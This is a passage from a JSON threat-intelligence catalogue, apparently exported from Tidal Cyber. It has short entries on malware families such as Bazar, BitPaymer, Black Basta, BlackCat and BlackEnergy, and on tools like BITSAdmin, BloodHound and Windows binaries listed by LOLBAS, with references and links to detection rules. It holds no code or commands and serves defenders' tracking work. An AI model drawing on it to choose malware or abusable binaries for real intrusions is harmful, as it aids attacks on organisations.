v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** File used by Windows subsystem for Linux\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\bash.exe\n* C:\\Windows\\SysWOW64\\bash.exe\n\n**Resources:**\n* [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n\n**Detection:**\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* Sigma: [proc_creation_win_lolbin_bash.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml)\n* IOC: Child process from bash.exe[[Bash.exe - LOLBAS Project](/references/7d3efbc7-6abf-4f3f-aec8-686100bb90ad)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5086", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "fe0ff225-66b8-4629-86e3-9b4ce9bf6eb8", + "type": "similar" + } + ], + "uuid": "cef3a09e-22ca-43dc-ad4a-95741a3b85ff", + "value": "Bash" + }, + { + "description": "Bat Armor is a tool used to generate .bat files using PowerShell scripts.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5027", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + } + ], + "uuid": "628037d4-962d-4f58-b32d-241d739bc62d", + "value": "Bat Armor" + }, + { + "description": "[[Cybereason Bazar July 2020](https://app.tidalcyber.com/references/8819875a-5139-4dae-94c8-e7cc9f847580)][[NCC Group Team9 June 2020](https://app.tidalcyber.com/references/0ea8f87d-e19d-438d-b05b-30f2ccd0ea3b)]", + "meta": { + "id": "471782a4-33da-4135-bf78-36c8edc02d02" + }, + "related": [ + { + "dest-uuid": "b35d9817-6ead-4dbd-a2fa-4b8e217f8eac", + "type": "similar" + } + ], + "uuid": "480398ef-e3b0-4434-b409-bc6bae0a56ea", + "value": "Team9" + }, + { + "description": "[[FireEye KEGTAP SINGLEMALT October 2020](https://app.tidalcyber.com/references/59162ffd-cb95-4757-bb1e-0c2a4ad5c083)][[CrowdStrike Wizard Spider October 2020](https://app.tidalcyber.com/references/5c8d67ea-63bc-4765-b6f6-49fa5210abe6)]", + "meta": { + "id": "cbebbbcc-31a5-4434-9f0a-4c88ae9a6044" + }, + "related": [ + { + "dest-uuid": "b35d9817-6ead-4dbd-a2fa-4b8e217f8eac", + "type": "similar" + } + ], + "uuid": "7de93c0d-efb9-481c-b1dc-ea5d786c47f9", + "value": "KEGTAP" + }, + { + "description": "[Bazar](https://app.tidalcyber.com/software/b35d9817-6ead-4dbd-a2fa-4b8e217f8eac) is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. [Bazar](https://app.tidalcyber.com/software/b35d9817-6ead-4dbd-a2fa-4b8e217f8eac) reportedly has ties to [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.[[Cybereason Bazar July 2020](https://app.tidalcyber.com/references/8819875a-5139-4dae-94c8-e7cc9f847580)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0534", + "source": "MITRE", + "tags": [ + "818c3d93-c010-44f4-82bc-b63b4bc6c3c2", + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "396a4361-3e84-47bc-9544-58e287c05799", + "type": "used-by" + }, + { + "dest-uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "type": "used-by" + }, + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "99fdf3b4-96ef-4ab9-b191-fc683441cad0", + "type": "similar" + }, + { + "dest-uuid": "480398ef-e3b0-4434-b409-bc6bae0a56ea", + "type": "similar" + }, + { + "dest-uuid": "7de93c0d-efb9-481c-b1dc-ea5d786c47f9", + "type": "similar" + } + ], + "uuid": "b35d9817-6ead-4dbd-a2fa-4b8e217f8eac", + "value": "Bazar" + }, + { + "description": "[BBK](https://app.tidalcyber.com/software/3daa5ae1-464e-4c0a-aa46-15264a2a0126) is a downloader that has been used by [BRONZE BUTLER](https://app.tidalcyber.com/groups/5825a840-5577-4ffc-a08d-3f48d64395cb) since at least 2019.[[Trend Micro Tick November 2019](https://app.tidalcyber.com/references/93adbf0d-5f5e-498e-aca1-ed3eb11561e7)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0470", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5825a840-5577-4ffc-a08d-3f48d64395cb", + "type": "used-by" + }, + { + "dest-uuid": "f0fc920e-57a3-4af5-89be-9ea594c8b1ea", + "type": "similar" + } + ], + "uuid": "3daa5ae1-464e-4c0a-aa46-15264a2a0126", + "value": "BBK" + }, + { + "description": "[BBSRAT](https://app.tidalcyber.com/software/be4dab36-d499-4ac3-b204-5e309e3a5331) is malware with remote access tool functionality that has been used in targeted compromises. [[Palo Alto Networks BBSRAT](https://app.tidalcyber.com/references/8c5d61ba-24c5-4f6c-a208-e0a5d23ebb49)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0127", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "64d76fa5-cf8f-469c-b78c-1a4f7c5bad80", + "type": "similar" + } + ], + "uuid": "be4dab36-d499-4ac3-b204-5e309e3a5331", + "value": "BBSRAT" + }, + { + "description": "[BendyBear](https://app.tidalcyber.com/software/a114a498-fcfd-4e0a-9d1e-e26750d71af8) is an x64 shellcode for a stage-zero implant designed to download malware from a C2 server. First discovered in August 2020, [BendyBear](https://app.tidalcyber.com/software/a114a498-fcfd-4e0a-9d1e-e26750d71af8) shares a variety of features with [Waterbear](https://app.tidalcyber.com/software/56872a5b-dc01-455c-85d5-06c577abb030), malware previously attributed to the Chinese cyber espionage group [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb).[[Unit42 BendyBear Feb 2021](https://app.tidalcyber.com/references/f5cbc08f-6f2c-4c81-9d68-07f61e16f138)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0574", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "805480f1-6caa-4a67-8ca9-b2b39650d986", + "type": "similar" + } + ], + "uuid": "a114a498-fcfd-4e0a-9d1e-e26750d71af8", + "value": "BendyBear" + }, + { + "description": "[[Bginfo.exe - LOLBAS Project](/references/ca1eaac2-7449-4a76-bec2-9dc5971fd808)]", + "meta": { + "id": "e85eca74-ca92-4480-8a4b-4a82efdbcd9c", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "fe926654-0cff-4e8e-b192-2fa1eb8a9a67", + "type": "similar" + } + ], + "uuid": "0a62aa36-aeba-4d97-bddb-d24cdb7d6093", + "value": "Bginfo.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Background Information Utility included with SysInternals Suite\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* No fixed path\n\n**Resources:**\n* [https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/](https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_bginfo.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)[[Bginfo.exe - LOLBAS Project](/references/ca1eaac2-7449-4a76-bec2-9dc5971fd808)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5207", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "0a62aa36-aeba-4d97-bddb-d24cdb7d6093", + "type": "similar" + } + ], + "uuid": "fe926654-0cff-4e8e-b192-2fa1eb8a9a67", + "value": "Bginfo" + }, + { + "description": "This Software object represents the custom backdoor tool used during intrusions conducted by the BianLian Ransomware Group.[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)][[BianLian Ransomware Gang Gives It a Go! | [redacted]](/references/fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d)]\n\n**Delivers**: TeamViewer[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)], Atera Agent[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)], Splashtop[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)], AnyDesk[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5001", + "source": "Tidal Cyber", + "tags": [ + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + } + ], + "uuid": "a4fb341d-8010-433f-b8f1-a8781f961435", + "value": "BianLian Ransomware (Backdoor)" + }, + { + "description": "[BISCUIT](https://app.tidalcyber.com/software/3ad98097-2d10-4aa1-9594-7e74828a3643) is a backdoor that has been used by [APT1](https://app.tidalcyber.com/groups/5307bba1-2674-4fbd-bfd5-1db1ae06fc5f) since as early as 2007. [[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0017", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "used-by" + }, + { + "dest-uuid": "b8eb28e4-48a6-40ae-951a-328714f75eda", + "type": "similar" + } + ], + "uuid": "3ad98097-2d10-4aa1-9594-7e74828a3643", + "value": "BISCUIT" + }, + { + "description": "[Bisonal](https://app.tidalcyber.com/software/b898816e-610f-4c2f-9045-d9f28a54ee58) is a remote access tool (RAT) that has been used by [Tonto Team](https://app.tidalcyber.com/groups/9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c) against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.[[Unit 42 Bisonal July 2018](https://app.tidalcyber.com/references/30b2ec12-b785-43fb-ab72-b37387046d15)][[Talos Bisonal Mar 2020](https://app.tidalcyber.com/references/eaecccff-e0a0-4fa0-81e5-799b23c26b5a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0268", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c", + "type": "used-by" + }, + { + "dest-uuid": "65ffc206-d7c1-45b3-b543-f6b726e7840d", + "type": "similar" + } + ], + "uuid": "b898816e-610f-4c2f-9045-d9f28a54ee58", + "value": "Bisonal" + }, + { + "description": "[[Crowdstrike Indrik November 2018](https://app.tidalcyber.com/references/0f85f611-90db-43ba-8b71-5d0d4ec8cdd5)]", + "meta": { + "id": "3e6794a0-c8bb-4163-990b-4bfad4a7d30b" + }, + "related": [ + { + "dest-uuid": "e7dec940-8701-4c06-9865-5b11c61c046d", + "type": "similar" + } + ], + "uuid": "cf8ab2a9-cef3-450b-ba43-5611d3202347", + "value": "FriedEx" + }, + { + "description": "[[Crowdstrike Indrik November 2018](https://app.tidalcyber.com/references/0f85f611-90db-43ba-8b71-5d0d4ec8cdd5)]", + "meta": { + "id": "30685f08-6fdb-42f6-88df-abf40c6afdd5" + }, + "related": [ + { + "dest-uuid": "e7dec940-8701-4c06-9865-5b11c61c046d", + "type": "similar" + } + ], + "uuid": "3591563f-70f1-4bbc-aef8-7aa686e0fd48", + "value": "wp_encrypt" + }, + { + "description": "[BitPaymer](https://app.tidalcyber.com/software/e7dec940-8701-4c06-9865-5b11c61c046d) is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. [BitPaymer](https://app.tidalcyber.com/software/e7dec940-8701-4c06-9865-5b11c61c046d) uses a unique encryption key, ransom note, and contact information for each operation. [BitPaymer](https://app.tidalcyber.com/software/e7dec940-8701-4c06-9865-5b11c61c046d) has several indicators suggesting overlap with the [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) malware and is often delivered via [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2).[[Crowdstrike Indrik November 2018](https://app.tidalcyber.com/references/0f85f611-90db-43ba-8b71-5d0d4ec8cdd5)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0570", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "3c7ad595-1940-40fc-b9ca-3e649c1e5d87", + "type": "used-by" + }, + { + "dest-uuid": "fa766a65-5136-4ff3-8429-36d08eaa0100", + "type": "similar" + }, + { + "dest-uuid": "cf8ab2a9-cef3-450b-ba43-5611d3202347", + "type": "similar" + }, + { + "dest-uuid": "3591563f-70f1-4bbc-aef8-7aa686e0fd48", + "type": "similar" + } + ], + "uuid": "e7dec940-8701-4c06-9865-5b11c61c046d", + "value": "BitPaymer" + }, + { + "description": "", + "meta": { + "id": "782fe1fa-34e1-46b2-9c5c-e25c2f1ffb63", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "52a20d3d-1edd-4f17-87f0-b77c67d260b4", + "type": "similar" + } + ], + "uuid": "0f4e83eb-bc61-485f-8e30-f28a051996fa", + "value": "Bitsadmin.exe" + }, + { + "description": "[BITSAdmin](https://app.tidalcyber.com/software/52a20d3d-1edd-4f17-87f0-b77c67d260b4) is a command line tool used to create and manage [BITS Jobs](https://app.tidalcyber.com/technique/6b278e5d-7383-42a4-9425-2da79bbe43e0). [[Microsoft BITSAdmin](https://app.tidalcyber.com/references/5b8c2a8c-f01e-491a-aaf9-504ee7a1caed)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0190", + "source": "MITRE", + "tags": [ + "fdd53e62-5bf1-41f1-8bd6-b970a866c39d", + "d431939f-2dc0-410b-83f7-86c458125444", + "10d09438-9ea5-405d-9b3a-36d351b5a5d9", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "0a245c5e-c1a8-480f-8655-bb2594e3266b", + "type": "used-by" + }, + { + "dest-uuid": "275ca7b0-3b21-4c3a-8b6f-57b6f0ffb6fb", + "type": "used-by" + }, + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "used-by" + }, + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "eecf7289-294f-48dd-a747-7705820f4735", + "type": "used-by" + }, + { + "dest-uuid": "64764dc6-a032-495f-8250-1e4c06bdc163", + "type": "similar" + }, + { + "dest-uuid": "0f4e83eb-bc61-485f-8e30-f28a051996fa", + "type": "similar" + } + ], + "uuid": "52a20d3d-1edd-4f17-87f0-b77c67d260b4", + "value": "BITSAdmin" + }, + { + "description": "[Black Basta](https://app.tidalcyber.com/software/0d5b24ba-68dc-50fa-8268-3012180fe374) is ransomware written in C++ that has been offered within the ransomware-as-a-service (RaaS) model since at least April 2022; there are variants that target Windows and VMWare ESXi servers. [Black Basta](https://app.tidalcyber.com/software/0d5b24ba-68dc-50fa-8268-3012180fe374) operations have included the double extortion technique where in addition to demanding ransom for decrypting the files of targeted organizations the cyber actors also threaten to post sensitive information to a leak site if the ransom is not paid. [Black Basta](https://app.tidalcyber.com/software/0d5b24ba-68dc-50fa-8268-3012180fe374) affiliates have targeted multiple high-value organizations, with the largest number of victims based in the U.S. Based on similarities in TTPs, leak sites, payment sites, and negotiation tactics, security researchers assess the [Black Basta](https://app.tidalcyber.com/software/0d5b24ba-68dc-50fa-8268-3012180fe374) RaaS operators could include current or former members of the [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) group.[[Palo Alto Networks Black Basta August 2022](https://app.tidalcyber.com/references/fc9ee531-3680-549b-86e0-a10a70c3ec67)][[Deep Instinct Black Basta August 2022](https://app.tidalcyber.com/references/72b64d7d-f8eb-54d3-83c8-a883906ceea1)][[Minerva Labs Black Basta May 2022](https://app.tidalcyber.com/references/6358f7ed-41d6-56be-83bb-179e0a8b7873)][[Avertium Black Basta June 2022](https://app.tidalcyber.com/references/31c2ef62-2852-5418-9d52-2479a3a619d0)][[NCC Group Black Basta June 2022](https://app.tidalcyber.com/references/b5f91f77-b102-5812-a79f-69b254487da8)][[Cyble Black Basta May 2022](https://app.tidalcyber.com/references/18035aba-0ae3-58b8-b426-86c2e38a37ae)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1070", + "source": "MITRE", + "tags": [ + "fdd53e62-5bf1-41f1-8bd6-b970a866c39d", + "d431939f-2dc0-410b-83f7-86c458125444", + "dea4388a-b1f2-4f2a-9df9-108631d0d078", + "2743d495-7728-4a75-9e5f-b64854039792", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "8d242fb4-9033-4f13-8a88-4b9b4bcd9a53", + "type": "similar" + } + ], + "uuid": "0d5b24ba-68dc-50fa-8268-3012180fe374", + "value": "Black Basta" + }, + { + "description": "[[Microsoft BlackCat Jun 2022](https://app.tidalcyber.com/references/55be1ca7-fdb7-5d76-a9c8-5f44a0d00b0e)][[ACSC BlackCat Apr 2022](https://app.tidalcyber.com/references/3b85eaeb-6bf5-529b-80a4-439ceb6c5d6d)]", + "meta": { + "id": "542586e8-8af1-5926-a8af-3873ab660aa7" + }, + "related": [ + { + "dest-uuid": "691369e5-ef74-5ff9-bc20-34efeb4b6c5b", + "type": "similar" + } + ], + "uuid": "e7af71b4-73c3-405a-9521-d239aa60eb20", + "value": "ALPHV" + }, + { + "description": "[[ACSC BlackCat Apr 2022](https://app.tidalcyber.com/references/3b85eaeb-6bf5-529b-80a4-439ceb6c5d6d)]", + "meta": { + "id": "a06013db-96b2-55d3-b677-bcb3a0c2b178" + }, + "related": [ + { + "dest-uuid": "691369e5-ef74-5ff9-bc20-34efeb4b6c5b", + "type": "similar" + } + ], + "uuid": "1db491da-16a4-4a9c-9b7c-c7e46f1a1dd0", + "value": "Noberus" + }, + { + "description": "[BlackCat](https://app.tidalcyber.com/software/691369e5-ef74-5ff9-bc20-34efeb4b6c5b) is ransomware written in Rust that has been offered via the Ransomware-as-a-Service (RaaS) model. First observed November 2021, [BlackCat](https://app.tidalcyber.com/software/691369e5-ef74-5ff9-bc20-34efeb4b6c5b) has been used to target multiple sectors and organizations in various countries and regions in Africa, the Americas, Asia, Australia, and Europe.[[Microsoft BlackCat Jun 2022](https://app.tidalcyber.com/references/55be1ca7-fdb7-5d76-a9c8-5f44a0d00b0e)][[Sophos BlackCat Jul 2022](https://app.tidalcyber.com/references/481a0106-d5b6-532c-8f5b-6c0c477185f4)][[ACSC BlackCat Apr 2022](https://app.tidalcyber.com/references/3b85eaeb-6bf5-529b-80a4-439ceb6c5d6d)]", + "meta": { + "platforms": [ + "Linux", + "Windows" + ], + "software_attack_id": "S1068", + "source": "MITRE", + "tags": [ + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "5e7433ad-a894-4489-93bc-41e90da90019", + "15787198-6c8b-4f79-bf50-258d55072fee", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "type": "used-by" + }, + { + "dest-uuid": "50c44c34-3abb-48ae-9433-a2337de5b0bc", + "type": "similar" + }, + { + "dest-uuid": "e7af71b4-73c3-405a-9521-d239aa60eb20", + "type": "similar" + }, + { + "dest-uuid": "1db491da-16a4-4a9c-9b7c-c7e46f1a1dd0", + "type": "similar" + } + ], + "uuid": "691369e5-ef74-5ff9-bc20-34efeb4b6c5b", + "value": "BlackCat" + }, + { + "description": "[BLACKCOFFEE](https://app.tidalcyber.com/software/e85e2fca-9347-4448-bfc1-342f29d5d6a1) is malware that has been used by several Chinese groups since at least 2013. [[FireEye APT17](https://app.tidalcyber.com/references/a303f97a-72dd-4833-bac7-a421addc3242)] [[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0069", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5f083251-f5dc-459a-abfc-47a1aa7f5094", + "type": "used-by" + }, + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "d69c8146-ab35-4d50-8382-6fc80e641d43", + "type": "similar" + } + ], + "uuid": "e85e2fca-9347-4448-bfc1-342f29d5d6a1", + "value": "BLACKCOFFEE" + }, + { + "description": "", + "meta": { + "id": "8e7fda99-b472-456c-a777-fe2163aa9a94" + }, + "related": [ + { + "dest-uuid": "908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f", + "type": "similar" + } + ], + "uuid": "2efd4571-2913-4ea3-95f8-b2e1aef4f953", + "value": "Black Energy" + }, + { + "description": "[BlackEnergy](https://app.tidalcyber.com/software/908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. [[F-Secure BlackEnergy 2014](https://app.tidalcyber.com/references/5f228fb5-d959-4c4a-bb8c-f9dc01d5af07)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0089", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4", + "type": "similar" + }, + { + "dest-uuid": "2efd4571-2913-4ea3-95f8-b2e1aef4f953", + "type": "similar" + } + ], + "uuid": "908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f", + "value": "BlackEnergy" + }, + { + "description": "[BlackMould](https://app.tidalcyber.com/software/da348a51-d047-4144-9ba4-34d2ce964a11) is a web shell based on [China Chopper](https://app.tidalcyber.com/software/723c5ab7-23ca-46f2-83bb-f1d1e550122c) for servers running Microsoft IIS. First reported in December 2019, it has been used in malicious campaigns by [GALLIUM](https://app.tidalcyber.com/groups/15ff1ce0-44f0-4f1d-a4ef-83444570e572) against telecommunication providers.[[Microsoft GALLIUM December 2019](https://app.tidalcyber.com/references/5bc76b47-ff68-4031-a347-f2dc0daba203)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0564", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "15ff1ce0-44f0-4f1d-a4ef-83444570e572", + "type": "used-by" + }, + { + "dest-uuid": "63c4511b-2d6e-4bb2-b582-e2e99a8a467d", + "type": "similar" + } + ], + "uuid": "da348a51-d047-4144-9ba4-34d2ce964a11", + "value": "BlackMould" + }, + { + "description": "[BLINDINGCAN](https://app.tidalcyber.com/software/1af8ea81-40df-4fba-8d63-1858b8b31217) is a remote access Trojan that has been used by the North Korean government since at least early 2020 in cyber operations against defense, engineering, and government organizations in Western Europe and the US.[[US-CERT BLINDINGCAN Aug 2020](https://app.tidalcyber.com/references/0421788c-b807-4e19-897c-bfb4323feb16)][[NHS UK BLINDINGCAN Aug 2020](https://app.tidalcyber.com/references/acca4c89-acce-4916-88b6-f4dac7d8ab19)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0520", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "01dbc71d-0ee8-420d-abb4-3dfb6a4bf725", + "type": "similar" + } + ], + "uuid": "1af8ea81-40df-4fba-8d63-1858b8b31217", + "value": "BLINDINGCAN" + }, + { + "description": "[BloodHound](https://app.tidalcyber.com/software/72658763-8077-451e-8572-38858f8cacf3) is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.[[GitHub Bloodhound](https://app.tidalcyber.com/references/e90b4941-5dff-4f38-b4dd-af3426fd621e)][[CrowdStrike BloodHound April 2018](https://app.tidalcyber.com/references/fa99f290-e42c-4311-9f6d-c519c9ab89fe)][[FoxIT Wocao December 2019](https://app.tidalcyber.com/references/aa3e31c7-71cd-4a3f-b482-9049c9abb631)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0521", + "source": "MITRE", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "cd1b5d44-226e-4405-8985-800492cf2865" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "type": "used-by" + }, + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "ca93af75-0ffa-4df4-b86a-92d4d50e496e", + "type": "used-by" + }, + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "2e2d3e75-1160-4ba5-80cc-8e7685fcfc44", + "type": "used-by" + }, + { + "dest-uuid": "6eb50f82-86cc-4eff-b1d1-66e1c6fd74f3", + "type": "used-by" + }, + { + "dest-uuid": 